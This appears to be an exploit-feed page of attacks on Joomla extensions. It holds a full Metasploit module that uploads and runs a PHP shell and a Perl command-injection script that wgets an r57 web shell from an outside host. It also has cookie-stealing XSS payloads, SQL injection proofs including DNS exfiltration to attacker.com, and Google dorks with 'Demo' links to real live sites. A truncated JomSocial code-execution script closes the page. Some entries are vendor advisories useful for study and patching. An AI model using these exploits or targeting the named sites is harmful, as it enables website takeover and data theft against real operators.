##################################### Title:com_jdownloads xss Vulnerability ##################### ############################################################## __ __ _____ _ ______ ______ _______ _____ | \/ | /\ | __ \| | | ____| ____|__ __/ ____| | \ / | / \ | | | | | | |__ | |__ | | | (___ | |\/| | / /\ \ | | | | | | __| | __| | | \___ \ | | | |/ ____ \| |__| | |____| |____| |____ | | ____) | |_| |_/_/ \_\_____/|______|______|______| |_| |_____/ ############################################################## #Author:Darksnipper & Dream.killer #Email:Darksnipper@live.com ##################################### #Home:- www.MadLeeTs.com ##################################### Vendor Link:Www.jdownloads.com Dork:-inurl:"component/jdownloads/search" Tested On:- Windows 7,Linux,Windows xp ###################################################################### #P.o.c http: //127.0.0.1/components/jdownloads/search payload <script>alert(document.cookie)</script> Demo:- http://dsya.goa.gov.in/component/jdownloads/search payload:- <script>alert(document.cookie)</script> ######################################################################## Greetz:Dream.killer,Soul~inj3ct0r,Error Haxor,Fazil Mir,Force-Ex,x3o-1337,Shadow008,1337,H4x0rl1f3,Invectus,Sahrawi Hacker,HaXor KaKKa,Retno Pro, Tr4ck3r,b0x,Gujjar Pcp,madc0de Haxor,P4k Command3r,Pain006,Anon DeXter,MindCracker,Ap3x Pr3d1at0r,Ment@l Mind,Sujit Ujale,All Madleets Members,Kashmiri Hackers & All Freedom Fighters. ######################################################################## |
↧
Joomla JDownloads Cross Site Scripting
↧
Joomla Media Manager File Upload Vulnerability
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Joomla Media Manager File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
which comes by default in Joomla, allowing arbitrary file uploads, and results in
arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
Manager, you will need to supply a valid username and password (Editor role or
higher) in order to work properly.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '95933' ],
[ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
[ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],
[ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],
[ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ]
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as POST data, so
# really it's unlimited
'Space' => 262144, # 256k
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Joomla 2.5.x <=2.5.13', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Aug 01 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
OptString.new('USERNAME', [false, 'User to login with', '']),
OptString.new('PASSWORD', [false, 'Password to login with', '']),
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def check
res = get_upload_form
if res and res.code == 200
if res.body =~ /You are not authorised to view this resource/
print_status("#{peer} - Joomla Media Manager Found but authentication required")
return Exploit::CheckCode::Detected
elsif res.body =~ /<form action="(.*)" id="uploadForm"/
print_status("#{peer} - Joomla Media Manager Found and authentication isn't required")
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
end
def upload(upload_uri)
begin
u = URI(upload_uri)
rescue ::URI::InvalidURIError
fail_with(Exploit::Failure::Unknown, "Unable to get the upload_uri correctly")
end
data = Rex::MIME::Message.new
data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{u.path}?#{u.query}",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => @cookies,
'vars_get' => {
'asset' => 'com_content',
'author' => '',
'format' => '',
'view' => 'images',
'folder' => ''
},
'data' => post_data
})
return res
end
def get_upload_form
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php"),
'cookie' => @cookies,
'encode_params' => false,
'vars_get' => {
'option' => 'com_media',
'view' => 'images',
'tmpl' => 'component',
'e_name' => 'jform_articletext',
'asset' => 'com_content',
'author' => ''
}
})
return res
end
def get_login_form
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
'cookie' => @cookies,
'vars_get' => {
'view' => 'login'
}
})
return res
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
'cookie' => @cookies,
'vars_get' => {
'task' => 'user.login'
},
'vars_post' => {
'username' => @username,
'password' => @password
}.merge(@login_options)
})
return res
end
def parse_login_options(html)
html.scan(/<input type="hidden" name="(.*)" value="(.*)" \/>/) {|option|
@login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1"
}
end
def exploit
@login_options = {}
@cookies = ""
@upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
@username = datastore['USERNAME']
@password = datastore['PASSWORD']
print_status("#{peer} - Checking Access to Media Component...")
res = get_upload_form
if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/
print_status("#{peer} - Authentication required... Proceeding...")
if @username.empty? or @password.empty?
fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials")
end
@cookies = res.get_cookies.sub(/;$/, "")
print_status("#{peer} - Accessing the Login Form...")
res = get_login_form
if res.nil? or res.code != 200 or res.body !~ /login/
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form")
end
parse_login_options(res.body)
res = login
if not res or res.code != 303
fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate")
end
elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/
print_status("#{peer} - Authentication isn't required.... Proceeding...")
@cookies = res.get_cookies.sub(/;$/, "")
else
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component")
end
print_status("#{peer} - Accessing the Upload Form...")
res = get_upload_form
if res and res.code == 200 and res.body =~ /<form action="(.*)" id="uploadForm"/
upload_uri = Rex::Text.html_decode($1)
else
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Upload Form")
end
print_status("#{peer} - Uploading shell...")
res = upload(upload_uri)
if res.nil? or res.code != 200
fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed")
end
register_files_for_cleanup("#{@upload_name}.")
print_status("#{peer} - Executing shell...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "images", @upload_name),
})
end
end |
↧
↧
Joomla Virtuemart 2.0.22a SQL Injection
------------------------------------------------------------ Joomla! VirtueMart component <= 2.0.22a - SQL Injection ------------------------------------------------------------ == Description == - Software link: http://www.virtuemart.net/ - Affected versions: All versions between 2.0.8 and 2.0.22a are vulnerable. - Vulnerability discovered by: Matias Fontanini == Vulnerability == The vulnerability is located in the "user" controller, "removeAddressST" task. The "virtuemart_userinfo_id" parameter is not properly sanitized before being used in the "DELETE" query performed in it, allowing the execution of arbitrary SQL queries. In order to exploit the vulnerability, an attacker must be authenticated as a customer in the application. However, since the system allows free account registration, this is not a problem. == Proof of concept == The following example URL uses the MySQL "sleep" function through the injection: http://example.com/index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=16%22%20and%20sleep(10)%20and%20%22%22%3D%22 == Solution == Upgrade the product to the 2.0.22b version. == Report timeline == [2013-08-15] Vulnerability reported to vendor. [2013-08-16] Developers answered back. [2013-08-22] VirtueMart 2.0.22b was released, which fixes the the reported issue. [2013-08-22] Public disclosure. |
↧
Joomla JVideoClip Blind SQL Injection
================================================================================ Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection ================================================================================ Author : SixP4ck3r Email & msn : SixP4ck3r@Bolivia.com Date : 21 Sept 2013 Critical Lvl : Medium Impact : Exposure of sensitive information Where : From Remote Blog : http://sixp4ck3r.blogspot.com/ Credits : To my love! Dork : inurl:com_jvideoclip --------------------------------------------------------------------------- [Exploting..Bug..Demo..] http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6 [Blind SQL Injection] http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[bSQLi]&Itemid=6 --------------------------------------------------------------------------- SixP4ck3r from Bolivia ___EOF____ |
↧
Joomla JMultimedia Command Execution
#!/usr/bin/perl
# Exploit Title: com_jmultimedia Remote Command Execution
# Author: Deepankar Arora and Rafay Baloch
# Vendor: http://joomlacode.org/gf/project/denvideo/
# Enter the target in this form --> http://victim.com/
# Change shell path to your own, if needed
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " com_jmultimedia Remote Command Execution exploit \n";
print " (Automatic Shell Upload) \n";
print " Deepankar Arora and Rafay Baloch \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " com_jmultimedia Remote Command Execution exploit \n";
print " (Automatic Shell Upload) \n";
print " By Deepankar Arora and Rafay Baloch \n";
print "======================================================\n";
sleep(1.1);
print "[*] Sending exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_jmultimedia/assets/thumbs/phpthumb/phpThumb.php?src=file.jpg&fltr
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
$cwebsite =
"$target/components/com_jmultimedia/assets/thumbs/phpthumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_jmultimedia/assets/thumbs/phpthumb/phpThumb.php?
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite =
"$target/components/com_jmultimedia/assets/thumbs/phpthumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
} |
(49)
↧
↧
Joomla MijoSearch Extension XSS and Full Path Disclosure
Advisory ID: HTB23186 Product: MijoSearch Vendor: Mijosoft Vulnerable Version(s): 2.0.1 and probably prior Tested Version: 2.0.1 Advisory Publication: November 25, 2013 [without technical details] Vendor Notification: November 25, 2013 Public Disclosure: December 16, 2013 Vulnerability Type: Cross-Site Scripting [CWE-79], Information Exposure Through Externally-generated Error Message [CWE-211] CVE References: CVE-2013-6878, CVE-2013-6879 Risk Level: Medium CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered 2 vulnerabilities in MijoSearch Joomla Extension, which can be exploited to gain access to potentially sensitive data and perform Cross-Site Scripting (XSS) attacks against users of vulnerable application. 1) Cross-site Scripting in MijoSearch: CVE-2013-6878 The vulnerability exists due to insufficient sanitisation of user-supplied data appended to "/component/mijosearch/search" URL. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The following exploitation example uses the JavaScript alert() function to display "ImmuniWeb" word: http://[host]/component/mijosearch/search?query=im%22%3E%3Cdiv%20onmouseover=alert%28%22ImmuniWeb%22%29%20style=%22width:100%;height:10000px;z-index:100%22%3E%3C/div%3E&limit=15&order=relevance&orderdir=desc 2) Information Exposure Through Externally-generated Error Message in MijoSearch: CVE-2013-6879 The vulnerability exists due to improper implementation of error handling mechanisms in "/component/mijosearch/search" URL. A remote attacker can send a specially crafted HTTP GET request to the vulnerable web application and gain knowledge of full installation path of the application. The following exploitation example displays a warning message and installation path (if PHP "display_errors" is on) http://[host]/component/mijosearch/search?query=im%22%3Eimmuniweb&limit=15%27%22%3Cb%3Eimmuniweb&order=relevance%27%22%3Cb%3Eimmuniweb&orderdir=desc%27%22%3Cb%3Eimmuniweb ----------------------------------------------------------------------------------------------- Solution: Currently we are not aware about any vendor-supplied patches or solutions. It's recommended to deactivate the vulnerable extension. Vendor notification and disclosure timeline: 2013-11-25 Vendor notified via online ticket system Vendor denies any vulnerabilities Vendor authorizes us to test his website Vulnerabilities reproduced (screenshots available) Vendor still denies the vulnerabilities 2013-11-26 Vendor provided with exact version of vulnerable system Vendor still denies the vulnerabilities Vendor refuses to collaborate Vendor refuses to confirm other vulnerable version(s) Vendor bans one of our IPs on online ticket system 2013-12-14 Vendor suspends our user account on online ticket system Vendor contacted again by all available emails 2013-12-16 No single reply from the vendor. ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23186 - https://www.htbridge.com/advisory/HTB23186 - Multiple Vulnerabilities in MijoSearch. [2] MijoSearch - http://mijosoft.com/joomla-extensions/mijosearch-joomla-search-engine - MijoSearch is flexible and powerful Joomla Search component with an easy-to-use interface. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. |
(84)
↧
Joomla AceSearch 3.0 Cross Site Scripting
#Title : Joomla Component AceSearch Cross Site Scripting #Author : DevilScreaM #Date : 5 January 2014 #Category : Web Applications #Product : http://www.joomace.net/joomla-extensions/acesearch/ #Version : 3.0 #Type : PHP #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Tested : Mozila, Chrome, Opera -> Windows & Linux #Vulnerabillity : Cross Site Scripting #Dork : inurl:component/acesearch/ Cross Site Scripting http://site-target/component/acesearch/search?query=”>[XSS] Use “> for Bypass Cross Site Scripting Example : http://kpi.go.id/index.php/component/acesearch/search?query=”><h1>DevilScreaM</h1> |
(73)
↧
Joomla Aclsfgpl Shell Upload
[+] Author: TUNISIAN CYBER [+] Exploit Title: Joomla Component com_aclsfgpl File Upload Vulnerability [+] Date: 07-01-2014 [+] Category: WebApp [+] Google Dork: :inurl:"index.php?option=com_aclsfgpl" add_form [+] Tested on: KaliLinux [+} Friend's blog: www.na3il.com ######################################################################################## +Exploit: You can upload file (.php/.php.jpg...) +P.O.C: 127.0.0.1/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form Shell path: copy shell pic link or 127.0.0.1/components/com_aclsfgpl/photos/ Demo: http://www.club-plongee.com/index.php?option=com_aclsfgpl&Itemid=155&ct=womenm&md=add_form http://www.triclubsandiego.org/index.php?option=com_aclsfgpl&Itemid=269&ct=tcsd1&md=add_form http://aero.decines.free.fr/modelisme/index.php?option=com_aclsfgpl&Itemid=90&ct=pet5&md=add_form ./3nD ######################################################################################## Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX ######################################################################################## |
(85)
↧
Joomla Melody Cross Site Scripting
[+] Author: TUNISIAN CYBER [+] Exploit Title: Joomla Component com_melody XSS Vulnerability [+] Date: 09-01-2014 [+] Category: WebApp [+] Google Dork: :inurl:"components/com_melody/" [+] Tested on: KaliLinux [+} Friend's blog: www.na3il.com ######################################################################################## +Exploit: The Joomla melody component suffers from an xss vulnerability. +P.O.C: 127.0.0.1/[PATH]/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>XSS</a> Demo: http://www.lachost.net/choir/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E http://nettlys.no/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E godsstream.com/~domain20/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(1)'>XSS</a> ./3nD ######################################################################################## Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX ######################################################################################## |
(43)
↧
↧
Joomla Sexy Polling Extension SQL Injection
Advisory ID: HTB23193 Product: Sexy Polling Joomla Extension Vendor: 2GLux Vulnerable Version(s): 1.0.8 and probably prior Tested Version: 1.0.8 Advisory Publication: December 26, 2013 [without technical details] Vendor Notification: December 26, 2013 Vendor Patch: January 8, 2014 Public Disclosure: January 16, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2013-7219 Risk Level: High CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in Sexy Polling Joomla Extension, which can be exploited to perform SQL Injection attacks. 1) SQL Injection in Sexy Polling Joomla Extension: CVE-2013-7219 The vulnerability exists due to insufficient validation of "answer_id[]" HTTP POST parameter passed to "/components/com_sexypolling/vote.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): <form action="http://[host]/components/com_sexypolling/vote.php"; method="post" name="main"> <input type="hidden" name="answer_id[]" value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','','','') -- "> <input type="submit" id="btn"> </form> ----------------------------------------------------------------------------------------------- Solution: Update to Sexy Polling 1.0.9 More Information: http://2glux.com/forum/sexypolling/sexy-polling-security-vulnerability-notification-t2026.html ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23193 - https://www.htbridge.com/advisory/HTB23193 - SQL Injection in Sexy Polling Joomla Extension. [2] Sexy Polling Joomla Extension - http://2glux.com/projects/sexypolling - Polling for Joomla. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. |
(21)
↧
Joomla JV Comment 3.0.2 SQL Injection
Advisory ID: HTB23195 Product: JV Comment Joomla Extension Vendor: joomlavi.com Vulnerable Version(s): 3.0.2 and probably prior Tested Version: 3.0.2 Advisory Publication: January 2, 2014 [without technical details] Vendor Notification: January 2, 2014 Vendor Patch: January 14, 2014 Public Disclosure: January 23, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-0794 Risk Level: Medium CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks. 1) SQL Injection in JV Comment Joomla Extension: CVE-2014-0794 The vulnerability exists due to insufficient validation of "id" HTTP POST parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. The following exploitation example displays version of MySQL database: <form action="http://[host]/index.php" method="post" name="main"> <input type="hidden" name="option" value="com_jvcomment"> <input type="hidden" name="task" value="comment.like"> <input type="hidden" name="id" value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))"> <input type="submit" id="btn"> </form> ----------------------------------------------------------------------------------------------- Solution: Update to JV Comment 3.0.3 More Information: http://extensions.joomla.org/extensions/contacts-and-feedback/articles-comments/23394 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23195 - https://www.htbridge.com/advisory/HTB23195 - SQL Injection in JV Comment Joomla Extension. [2] JV Comment Joomla Extension - http://www.joomlavi.com/joomla-extensions/jv-comment.html - With JV Comment, adding a comment system to your articles is now as simple as installing a plug-in and adjusting a few parameters. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. |
(253)
↧
Joomla Komento 1.7.2 Cross Site Scripting
Advisory ID: HTB23194 Product: Komento Joomla Extension Vendor: Stack Ideas Sdn Bhd. Vulnerable Version(s): 1.7.2 and probably prior Tested Version: 1.7.2 Advisory Publication: January 2, 2014 [without technical details] Vendor Notification: January 2, 2014 Vendor Patch: January 2, 2014 Public Disclosure: January 23, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-0793 Risk Level: Medium CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Komento Joomla Extension, which can be exploited to perform script insertion attacks. 1) Cross-Site Scripting (XSS) in Komento Joomla Extension: CVE-2014-0793 1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "website" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "Website" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the nickname of the malicious author. The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's nickname in comment: <form action="http://[host]/?option=com_komento" method="post" name="main"> <input type="hidden" name="tmpl" value="component"> <input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component" value="com_content"> <input type="hidden" name="cid" value="24"> <input type="hidden" name="comment" value="comment"> <input type="hidden" name="parent_id" value="0"> <input type="hidden" name="name" value="name"> <input type="hidden" name="email" value="email@email.com"> <input type="hidden" name="website" value='http://www.htbridge.com" onclick="javascript:alert(/immuniweb/);"'> <input type="hidden" name="subscribe" value="false"> <input type="hidden" name="latitude" value=''> <input type="hidden" name="longitude" value="1"> <input type="hidden" name="address" value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId" value="435"> <input type="hidden" name="option" value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment"> <input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form> 1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "latitude" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "latitude" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the address of the malicious author. The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's address in comment: <form action="http://[host]/?option=com_komento" method="post" name="main"> <input type="hidden" name="tmpl" value="component"> <input type="hidden" name="format" value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component" value="com_content"> <input type="hidden" name="cid" value="24"> <input type="hidden" name="comment" value="comment"> <input type="hidden" name="parent_id" value="0"> <input type="hidden" name="name" value="name"> <input type="hidden" name="email" value="email@email.com"> <input type="hidden" name="website" value='www.htbridge.com'> <input type="hidden" name="subscribe" value="false"> <input type="hidden" name="latitude" value='" onclick="javascript:alert(/imuniweb/);">'> <input type="hidden" name="longitude" value="1"> <input type="hidden" name="address" value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId" value="435"> <input type="hidden" name="option" value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment"> <input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form> ----------------------------------------------------------------------------------------------- Solution: Update to Komento 1.7.3 More Informaion: http://stackideas.com/downloads/changelog/komento ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23194 - https://www.htbridge.com/advisory/HTB23194 - Cross-Site Scripting (XSS) in Komento Joomla Extension. [2] Komento Joomla Extension - http://stackideas.com/ - Komento is a Joomla comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. |
(91)
↧
Joomla JomSocial component >= 2.6 PHP code execution
#!/usr/bin/python
#
# Joomla! JomSocial component >= 2.6 PHP code execution exploit
#
# Authors:
# - Matias Fontanini
# - Gaston Traberg
#
# This exploit allows the execution of PHP code without any prior
# authentication on the Joomla! JomSocial component.
#
# Note that in order to be able to execute PHP code, both the "eval"
# and "assert" functions must be enabled. It is also possible to execute
# arbitrary PHP functions, without using them. Therefore, it is possible
# to execute shell commands using "system", "passthru", etc, as long
# as they are enabled.
#
# Examples:
#
# Execute PHP code:
# ./exploit.py -u http://example.com/index.php -p "echo 'Hello World!';"
# ./exploit.py -u http://example.com/index.php -p /tmp/script_to_execute.php
#
# Execute shell commands(using system()):
# ./exploit.py -u http://example.com/index.php -s "netstat -n"
#
# Exploit shell commands(using a user provided function, passthru in this case)
# ./exploit.py -u http://example.com/joomla/index.php -s "netstat -natp" -c passthru
#
# Exploit execution example:
# $ python exploit.py -u http://example.com/index.php -p 'var_dump("Hello World!");'
# [i] Retrieving cookies and anti-CSRF token... Done
# [+] Executing PHP code...
# string(12) "Hello World!"
import urllib, urllib2, re, argparse, sys, os
class Exploit:
token_request_data = 'option=com_community&view=frontpage'
